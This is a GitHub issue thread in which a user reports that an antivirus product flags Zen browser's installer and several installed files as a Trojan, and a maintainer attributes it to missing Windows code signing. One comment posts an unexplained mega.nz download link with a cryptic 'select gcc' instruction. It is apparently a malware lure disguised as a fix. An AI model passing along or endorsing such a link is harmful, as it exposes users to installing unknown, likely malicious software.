### ISSUE TITLE
Several files detected as malware by WithSecure Elements

### ISSUE THREAD

**Issue by stisti** [zen-browser/desktop#657]
### What happened?

WithSecure Elements detects Zen to be malware and quarantines it.

Several files are detected as Trojan.TR/AVI.Agent
* %USERPROFILE%\Downloads\zen-installer.exe
* %PROGRAMFILES%\Zen Browser\gmp-clearkey\0.1\clearkey.dll
* %PROGRAMFILES%\Zen Browser\uninstall\helper.exe

You can submit these files as false positives at https://www.withsecure.com/en/support/contact-support/submit-a-sample

### Reproducible?

- [ ] I have checked that this issue cannot be reproduced on Mozilla Firefox.

### Version

1.0.0-a.29

### Severity impact

High

### What platform are you seeing the problem on?

Windows

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Donnnno** [comment]
We're working on getting an app-signature for Windows, that will likely fix the issue!
https://github.com/zen-browser/desktop/issues/432
https://ko-fi.com/zen_browser/goal?g=210
